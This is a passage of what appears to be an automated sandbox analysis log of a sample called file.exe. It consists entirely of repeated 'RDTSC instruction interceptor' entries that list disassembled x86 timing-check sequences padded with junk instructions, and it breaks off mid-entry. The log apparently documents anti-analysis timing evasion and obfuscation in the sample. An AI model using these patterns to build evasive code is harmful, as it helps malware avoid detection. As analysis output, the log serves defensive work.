Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BABAD second address: 9BABB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BECC0 second address: 9BECD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4407343DDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFDFF second address: 9BFE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE03 second address: 9BFE09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE09 second address: 9BFE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE0F second address: 9BFE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE13 second address: 9BFE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE17 second address: 9BFE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA4407343E5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE37 second address: 9BFE3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE3E second address: 9BFE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FA4407343E6h 0x0000000d push 00000000h 0x0000000f mov edi, 748DBB68h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FA4407343D8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE90 second address: 9BFE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFE94 second address: 9BFEA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFEA8 second address: 9BFEAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFEAD second address: 9BFEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA4407343D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FA4407343D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFEC5 second address: 9BFED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA44129712Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BFED4 second address: 9BFED9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BBC02 second address: 9BBC07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BBC07 second address: 9BBC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BCC4D second address: 9BCC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BCC59 second address: 9BCC5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BDE6E second address: 9BDE78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA441297126h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C4190 second address: 9C41A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4407343DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C5083 second address: 9C50C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA441297128h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FA441297128h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 or bx, 3EDFh 0x0000002c push 00000000h 0x0000002e mov bx, dx 0x00000031 push 00000000h 0x00000033 mov ebx, dword ptr [ebp+122D3641h] 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C50C8 second address: 9C50CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C50CC second address: 9C50DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA44129712Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6098 second address: 9C609C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD7B9 second address: 9CD7D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA441297135h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD7D4 second address: 9CD7DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD7DC second address: 9CD7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD1E9 second address: 9CD1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD1F3 second address: 9CD1F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD341 second address: 9CD347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD347 second address: 9CD352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD352 second address: 9CD371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E5h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD371 second address: 9CD38F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA44129712Dh 0x0000000e jnl 00007FA441297128h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CD38F second address: 9CD3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4407343E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C10C6 second address: 9C10CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C10CB second address: 9C10D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C5236 second address: 9C523D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C523D second address: 9C5242 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C5242 second address: 9C5253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FA441297126h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C5253 second address: 9C5260 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6223 second address: 9C6228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D85E3 second address: 9D8606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E9h 0x00000007 jl 00007FA4407343D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 974849 second address: 974851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7351 second address: 9D7355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7C4B second address: 9D7C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D80B0 second address: 9D80B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DB327 second address: 9DB35D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297133h 0x00000007 jmp 00007FA441297136h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f ja 00007FA441297126h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DB35D second address: 9DB364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DB364 second address: 9DB374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA44129712Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DB374 second address: 9DB378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1560 second address: 9E1568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1568 second address: 9E156E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E156E second address: 9E1577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1577 second address: 9E157D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E157D second address: 9E1583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E19BE second address: 9E19C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E19C4 second address: 9E19C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E19C9 second address: 9E1A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FA4407343E5h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA4407343E0h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1A16 second address: 9E1A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1A1F second address: 9E1A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E1EF4 second address: 9E1EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9928E6 second address: 9928EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9928EA second address: 9928EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9928EE second address: 9928F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9928F8 second address: 9928FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9928FC second address: 99292C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FA4407343E4h 0x00000012 jo 00007FA4407343D6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007FA4407343D6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99292C second address: 992930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992930 second address: 992952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA4407343D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FA4407343E2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992952 second address: 99295C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA441297126h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E232F second address: 9E2348 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FA4407343DFh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E2348 second address: 9E2372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297132h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA441297132h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E0BC5 second address: 9E0BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2811 second address: 9B2815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2815 second address: 9B281B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B281B second address: 9B2869 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FA441297126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FA441297134h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edi 0x00000018 nop 0x00000019 mov edi, 39D22CA4h 0x0000001e lea eax, dword ptr [ebp+1248651Bh] 0x00000024 mov dword ptr [ebp+124561B2h], ebx 0x0000002a nop 0x0000002b jnl 00007FA44129712Eh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2869 second address: 9B2880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4407343E2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2A2C second address: 9B2A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2CCD second address: 9B2CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2E68 second address: 9B2E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2E6E second address: 9B2E94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FA4407343DAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2E94 second address: 9B2E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2E9C second address: 9B2EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jl 00007FA4407343E2h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FA4407343DFh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e jmp 00007FA4407343DBh 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B312D second address: 9B3151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA441297138h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3151 second address: 9B315C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA4407343D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B324A second address: 9B3259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA441297126h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3259 second address: 9B325D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B32F4 second address: 9B3361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA441297135h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FA44129712Eh 0x00000012 jc 00007FA441297135h 0x00000018 jmp 00007FA44129712Fh 0x0000001d popad 0x0000001e nop 0x0000001f mov ecx, 4EFE0E77h 0x00000024 push 00000004h 0x00000026 mov dx, 2D8Fh 0x0000002a nop 0x0000002b jnc 00007FA441297139h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3361 second address: 9B3368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3952 second address: 9B3956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3A9A second address: 9B3A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3B61 second address: 9B3BBE instructions: 0x00000000 rdtsc 0x00000002 je 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D18C7h], ecx 0x00000014 lea eax, dword ptr [ebp+1248655Fh] 0x0000001a jmp 00007FA441297133h 0x0000001f mov ecx, dword ptr [ebp+122D18B2h] 0x00000025 nop 0x00000026 push ebx 0x00000027 pushad 0x00000028 jmp 00007FA441297134h 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 pop ebx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jns 00007FA44129712Ch 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3BBE second address: 9B3BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B3BC4 second address: 9928E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FA441297128h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 movsx edx, di 0x0000002a lea eax, dword ptr [ebp+1248651Bh] 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FA441297128h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a jmp 00007FA44129712Bh 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FA44129712Ch 0x00000056 pop edx 0x00000057 mov dword ptr [esp], eax 0x0000005a jmp 00007FA44129712Ah 0x0000005f call dword ptr [ebp+122D1967h] 0x00000065 pushad 0x00000066 jno 00007FA44129712Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 